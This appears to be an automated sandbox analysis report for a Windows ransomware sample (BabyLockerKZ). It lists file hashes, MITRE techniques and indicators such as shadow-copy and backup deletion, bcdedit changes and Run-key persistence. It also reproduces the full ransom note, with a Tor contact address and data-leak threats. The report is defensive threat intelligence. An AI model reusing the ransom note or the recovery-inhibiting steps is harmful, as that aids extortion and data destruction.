51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51

Analysis

max time kernel
149s
max time network
121s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
27-02-2024 17:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
Size

340KB
MD5

714870c33ba84e744b84b32e6e114ed9
SHA1

840f442d4466713becdf72b88846871330ac38e7
SHA256

51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51
SHA512

270c584cc9f696de3421429627a07bfbd7829a033cfdc16280e7e233e8ae09e2f1cd0341537a6b050811683d93a14a1465aa3ab96e9577c98ebea521faae65f2
SSDEEP

6144:PNs9prB0CnszdPZxMzk1ukSXa9bnuDOeFdGpBP7ENf3zcfUE:y9RaPZxMzk1uBXa9bu2JeAfUE

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

\Device\HarddiskVolume1\Boot\da-DK\HOW_TO_BACK_FILES.html

Ransom Note

<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">{{IDENTIFIER}}</span> <br>  </div> </div>  <div class="tabs">  <div class="tab"> <div id="tab-content1" class="content"> <div class="text">  <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br>  <hr> <b>Contact us for price and get decryption software.</b><br><br> <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br> * Note that this server is available via Tor browser only<br><br> Follow the instructions to open the link:<br> 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.<br> 2. Press "Download Tor", then press "Download Tor Browser Bundle", install and run it.<br> 3. Now you have Tor browser. In the Tor Browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. Start a chat and follow the further instructions. <br> <hr> <b>If you can not use the above link, use the email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div>   </div> </div>  </div> </div> </body> </html>

Emails

href="[email protected]

">[email protected]

href="[email protected]

">[email protected]

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

description pid process target process

PID 2240 created 1136 2240 51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe Explorer.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2524 bcdedit.exe
2480 bcdedit.exe
Renames multiple (7532) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

2688 wbadmin.exe
Deletes system backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

2408 wbadmin.exe

description	pid	process	target process
PID 2240 created 1136	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	Explorer.EXE

pid	process
2524	bcdedit.exe
2480	bcdedit.exe

pid	process
2688	wbadmin.exe

pid	process
2408	wbadmin.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe\""	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe\""	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

description	ioc	process
File opened (read-only)	\??\H:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\J:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\L:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\M:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\O:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\U:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\X:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\F:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\A:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\P:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\T:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\Y:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\E:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\G:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\R:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\S:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\V:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\W:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\B:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\I:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\K:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\N:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\Q:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened (read-only)	\??\Z:	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

Drops file in Program Files directory 64 IoCs

Processes:

51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\SBCGLOBAL.NET.XML	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\US_export_policy.jar	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00454_.WMF	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115856.GIF	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\POSTCD11.POC	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\ado\msado27.tlb	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files (x86)\Windows Mail\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OneNote\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\settings.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME20.CSS	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ka.txt	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_ON.GIF	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\currency.js	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\js\RSSFeeds.js	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBOXES.DPV	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\flyout.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL_COL.HXT	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files\Microsoft Games\More Games\fr-FR\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\0.png	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106222.WMF	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files\VideoLAN\VLC\locale\nb\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\lua\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\slideShow.js	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOCS.ICO	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\gadget.xml	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090777.WMF	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10256_.GIF	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\INFOML.ICO	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\js\slideShow.js	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\en-US\jsdbgui.dll.mui	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-dock.png	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Edmonton	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107316.WMF	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LTHD98SP.POC	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\HOW_TO_BACK_FILES.html	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2624 vssadmin.exe

pid	process
2624	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2452	taskkill.exe
2008	taskkill.exe
2648	taskkill.exe
2260	taskkill.exe
2604	taskkill.exe
1416	taskkill.exe
2720	taskkill.exe
2744	taskkill.exe
1484	taskkill.exe
2468	taskkill.exe
2880	taskkill.exe
2192	taskkill.exe
2024	taskkill.exe
2492	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

pid	process
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
